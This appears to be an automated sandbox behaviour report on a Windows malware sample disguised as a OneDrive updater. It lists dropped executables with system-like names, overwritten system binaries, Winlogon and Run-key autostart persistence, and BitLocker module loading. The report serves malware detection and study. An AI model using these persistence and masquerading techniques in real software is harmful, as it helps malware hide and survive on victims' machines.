Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: OneDriveStandaloneUpdater.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini.pdb source: csrss.exe, 00000043.00000002.1980050735.00000000010AF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ;C:\Users\user\AppData\Local\Temp\3caoicbj\3caoicbj.pdb source: OneDriveStandaloneUpdater.exe, 00000000.00000002.1328499535.0000000002C76000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.iniem.pdb source: csrss.exe, 00000033.00000002.1851417029.0000000000EB0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ;C:\Users\user\AppData\Local\Temp\f4wp5ulp\f4wp5ulp.pdb source: OneDriveStandaloneUpdater.exe, 00000000.00000002.1328499535.0000000002C76000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.inim.pdb source: csrss.exe, 00000029.00000002.1717735778.00000000010AC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: m.pdb source: MjlsqDcSPlv.exe, 0000003F.00000002.2662319769.000000001B330000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: m.pdb0 source: OneDriveStandaloneUpdater.exe, 00000038.00000002.2634469219.000000001ADF0000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f4wp5ulp\f4wp5ulp.cmdline"
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3caoicbj\3caoicbj.cmdline"
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f4wp5ulp\f4wp5ulp.cmdline"	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3caoicbj\3caoicbj.cmdline"	Jump to behavior

Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Code function: 0_2_00007FFAAC468163 push ebx; ret	0_2_00007FFAAC46816A
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Code function: 0_2_00007FFAAC46FB02 pushad ; ret	0_2_00007FFAAC46FB03
Source: C:\Users\Public\Documents\csrss.exe	Code function: 32_2_00007FFAAC4CEFD6 push es; retf	32_2_00007FFAAC4CEFD7
Source: C:\Users\Public\Documents\csrss.exe	Code function: 32_2_00007FFAAC46FB02 pushad ; ret	32_2_00007FFAAC46FB03
Source: C:\Users\Public\Documents\csrss.exe	Code function: 32_2_00007FFAAC468163 push ebx; ret	32_2_00007FFAAC46816A
Source: C:\Users\Public\Documents\csrss.exe	Code function: 41_2_00007FFAAC46FB02 pushad ; ret	41_2_00007FFAAC46FB03
Source: C:\Users\Public\Documents\csrss.exe	Code function: 41_2_00007FFAAC468163 push ebx; ret	41_2_00007FFAAC46816A
Source: C:\Users\Public\Documents\csrss.exe	Code function: 41_2_00007FFAAC4CEFD6 push es; retf	41_2_00007FFAAC4CEFD7
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Code function: 46_2_00007FFAAC488163 push ebx; ret	46_2_00007FFAAC48816A
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Code function: 46_2_00007FFAAC48FB02 pushad ; ret	46_2_00007FFAAC48FB03
Source: C:\Users\Public\Documents\csrss.exe	Code function: 51_2_00007FFAAC478163 push ebx; ret	51_2_00007FFAAC47816A
Source: C:\Users\Public\Documents\csrss.exe	Code function: 51_2_00007FFAAC47FB02 pushad ; ret	51_2_00007FFAAC47FB03
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Code function: 56_2_00007FFAAC48FB02 pushad ; ret	56_2_00007FFAAC48FB03
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Code function: 56_2_00007FFAAC4EEFD6 push es; retf	56_2_00007FFAAC4EEFD7
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Code function: 56_2_00007FFAAC488163 push ebx; ret	56_2_00007FFAAC48816A
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Code function: 63_2_00007FFAAC458163 push ebx; ret	63_2_00007FFAAC45816A
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Code function: 63_2_00007FFAAC45FB02 pushad ; ret	63_2_00007FFAAC45FB03
Source: C:\Users\Public\Documents\csrss.exe	Code function: 67_2_00007FFAAC4EEFD6 push es; retf	67_2_00007FFAAC4EEFD7
Source: C:\Users\Public\Documents\csrss.exe	Code function: 67_2_00007FFAAC48FB02 pushad ; ret	67_2_00007FFAAC48FB03
Source: C:\Users\Public\Documents\csrss.exe	Code function: 67_2_00007FFAAC488163 push ebx; ret	67_2_00007FFAAC48816A

Persistence and Installation Behavior

Drops PE files with benign system names

Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe

File created: C:\Users\Public\Documents\csrss.exe

Jump to dropped file

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	System file written: C:\Windows\System32\SecurityHealthSystray.exe			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe			Jump to behavior

Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	File created: C:\Users\user\Desktop\pniscWHs.log	Jump to dropped file
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	File created: C:\Users\user\Desktop\vcUYBlwU.log	Jump to dropped file
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	File created: C:\Users\user\Desktop\YUqBbklL.log	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Windows\System32\SecurityHealthSystray.exe	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	File created: C:\Users\user\Desktop\tYWrkemb.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	File created: C:\Users\user\Desktop\lYJBZlMp.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	File created: C:\Users\user\Desktop\OnkfajLl.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	File created: C:\Users\user\Desktop\wnmzmVNo.log	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Jump to dropped file
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	File created: C:\Users\user\Desktop\APmXeiLI.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	File created: C:\Users\user\Desktop\GKdPiyNu.log	Jump to dropped file
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	File created: C:\Users\user\Desktop\PlXlrHgd.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	File created: C:\Users\user\Desktop\oJeKCcyH.log	Jump to dropped file
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	File created: C:\Users\user\Desktop\lJHjOcES.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	File created: C:\Users\user\Desktop\GVFPWxSW.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	File created: C:\Users\user\Desktop\UJJDbPGV.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	File created: C:\Users\user\Desktop\HsjPOZbA.log	Jump to dropped file
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	File created: C:\Users\user\Desktop\hJaCsdsL.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	File created: C:\Users\user\Desktop\LAjmiABv.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	File created: C:\Users\user\Desktop\ZXUBvZWR.log	Jump to dropped file
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	File created: C:\Program Files\Windows Mail\MjlsqDcSPlv.exe	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	File created: C:\Users\user\Desktop\QEZfGaYD.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	File created: C:\Users\user\Desktop\ntqjPtDe.log	Jump to dropped file
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	File created: C:\Users\Public\Documents\csrss.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	File created: C:\Users\user\Desktop\pzyaVZFL.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	File created: C:\Users\user\Desktop\AVoOdXhS.log	Jump to dropped file
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	File created: C:\Users\user\Desktop\IzKxwscH.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	File created: C:\Users\user\Desktop\sjwHPvrg.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	File created: C:\Users\user\Desktop\vqLrRVyt.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	File created: C:\Users\user\Desktop\SrUDuXuD.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	File created: C:\Users\user\Desktop\XVEvJLRT.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	File created: C:\Users\user\Desktop\dVzTSQDZ.log	Jump to dropped file
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	File created: C:\Users\user\Desktop\XbGmIAmd.log	Jump to dropped file
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	File created: C:\Users\user\Desktop\hyzrKdBs.log	Jump to dropped file
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	File created: C:\Users\user\Desktop\pbHguWQZ.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	File created: C:\Users\user\Desktop\WoNdSLwd.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	File created: C:\Users\user\Desktop\JOMOLeeW.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	File created: C:\Users\user\Desktop\EERPqGGD.log	Jump to dropped file
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	File created: C:\Users\user\Desktop\NsnWYYhw.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	File created: C:\Users\user\Desktop\JDsxUuzs.log	Jump to dropped file
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	File created: C:\Users\Public\MjlsqDcSPlv.exe	Jump to dropped file
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	File created: C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	File created: C:\Users\user\Desktop\NIROLNIi.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	File created: C:\Users\user\Desktop\rBkIrIJH.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	File created: C:\Users\user\Desktop\vaJZGNqW.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	File created: C:\Users\user\Desktop\fxnuLaBD.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	File created: C:\Users\user\Desktop\CUnYbBNA.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	File created: C:\Users\user\Desktop\WTfEbhlW.log	Jump to dropped file
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	File created: C:\Users\user\Desktop\LpAoDpdA.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	File created: C:\Users\user\Desktop\ocVadywh.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	File created: C:\Users\user\Desktop\xJPzewWS.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	File created: C:\Users\user\Desktop\BSPWzXwN.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	File created: C:\Users\user\Desktop\caoTeAzl.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	File created: C:\Users\user\Desktop\WmaEvGYQ.log	Jump to dropped file

Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe

File created: C:\Users\Public\MjlsqDcSPlv.exe

Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

File created: C:\Windows\System32\SecurityHealthSystray.exe

Jump to dropped file

Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	File created: C:\Users\user\Desktop\vcUYBlwU.log	Jump to dropped file
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	File created: C:\Users\user\Desktop\APmXeiLI.log	Jump to dropped file
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	File created: C:\Users\user\Desktop\pbHguWQZ.log	Jump to dropped file
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	File created: C:\Users\user\Desktop\hyzrKdBs.log	Jump to dropped file
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	File created: C:\Users\user\Desktop\YUqBbklL.log	Jump to dropped file
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	File created: C:\Users\user\Desktop\PlXlrHgd.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	File created: C:\Users\user\Desktop\AVoOdXhS.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	File created: C:\Users\user\Desktop\WoNdSLwd.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	File created: C:\Users\user\Desktop\LAjmiABv.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	File created: C:\Users\user\Desktop\BSPWzXwN.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	File created: C:\Users\user\Desktop\sjwHPvrg.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	File created: C:\Users\user\Desktop\ZXUBvZWR.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	File created: C:\Users\user\Desktop\XVEvJLRT.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	File created: C:\Users\user\Desktop\OnkfajLl.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	File created: C:\Users\user\Desktop\EERPqGGD.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	File created: C:\Users\user\Desktop\vaJZGNqW.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	File created: C:\Users\user\Desktop\tYWrkemb.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	File created: C:\Users\user\Desktop\ocVadywh.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	File created: C:\Users\user\Desktop\pzyaVZFL.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	File created: C:\Users\user\Desktop\lJHjOcES.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	File created: C:\Users\user\Desktop\caoTeAzl.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	File created: C:\Users\user\Desktop\SrUDuXuD.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	File created: C:\Users\user\Desktop\JOMOLeeW.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	File created: C:\Users\user\Desktop\rBkIrIJH.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	File created: C:\Users\user\Desktop\dVzTSQDZ.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	File created: C:\Users\user\Desktop\vqLrRVyt.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	File created: C:\Users\user\Desktop\QEZfGaYD.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	File created: C:\Users\user\Desktop\GVFPWxSW.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	File created: C:\Users\user\Desktop\wnmzmVNo.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	File created: C:\Users\user\Desktop\oJeKCcyH.log	Jump to dropped file
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	File created: C:\Users\user\Desktop\LpAoDpdA.log	Jump to dropped file
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	File created: C:\Users\user\Desktop\IzKxwscH.log	Jump to dropped file
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	File created: C:\Users\user\Desktop\pniscWHs.log	Jump to dropped file
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	File created: C:\Users\user\Desktop\hJaCsdsL.log	Jump to dropped file
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	File created: C:\Users\user\Desktop\XbGmIAmd.log	Jump to dropped file
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	File created: C:\Users\user\Desktop\NsnWYYhw.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	File created: C:\Users\user\Desktop\lYJBZlMp.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	File created: C:\Users\user\Desktop\HsjPOZbA.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	File created: C:\Users\user\Desktop\xJPzewWS.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	File created: C:\Users\user\Desktop\fxnuLaBD.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	File created: C:\Users\user\Desktop\WTfEbhlW.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	File created: C:\Users\user\Desktop\UJJDbPGV.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	File created: C:\Users\user\Desktop\JDsxUuzs.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	File created: C:\Users\user\Desktop\GKdPiyNu.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	File created: C:\Users\user\Desktop\ntqjPtDe.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	File created: C:\Users\user\Desktop\WmaEvGYQ.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	File created: C:\Users\user\Desktop\NIROLNIi.log	Jump to dropped file
Source: C:\Users\Public\Documents\csrss.exe	File created: C:\Users\user\Desktop\CUnYbBNA.log	Jump to dropped file

Boot Survival

Creates an undocumented autostart registry key

Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior

Creates multiple autostart registry keys

Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDriveStandaloneUpdater	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run csrss	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MjlsqDcSPlv	Jump to behavior

Drops PE files to the user root directory

Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe

File created: C:\Users\Public\MjlsqDcSPlv.exe

Jump to dropped file

Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run csrss	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run csrss	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MjlsqDcSPlv	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MjlsqDcSPlv	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MjlsqDcSPlv	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MjlsqDcSPlv	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDriveStandaloneUpdater	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDriveStandaloneUpdater	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MjlsqDcSPlv	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MjlsqDcSPlv	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MjlsqDcSPlv	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MjlsqDcSPlv	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MjlsqDcSPlv	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MjlsqDcSPlv	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MjlsqDcSPlv	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MjlsqDcSPlv	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MjlsqDcSPlv	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MjlsqDcSPlv	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
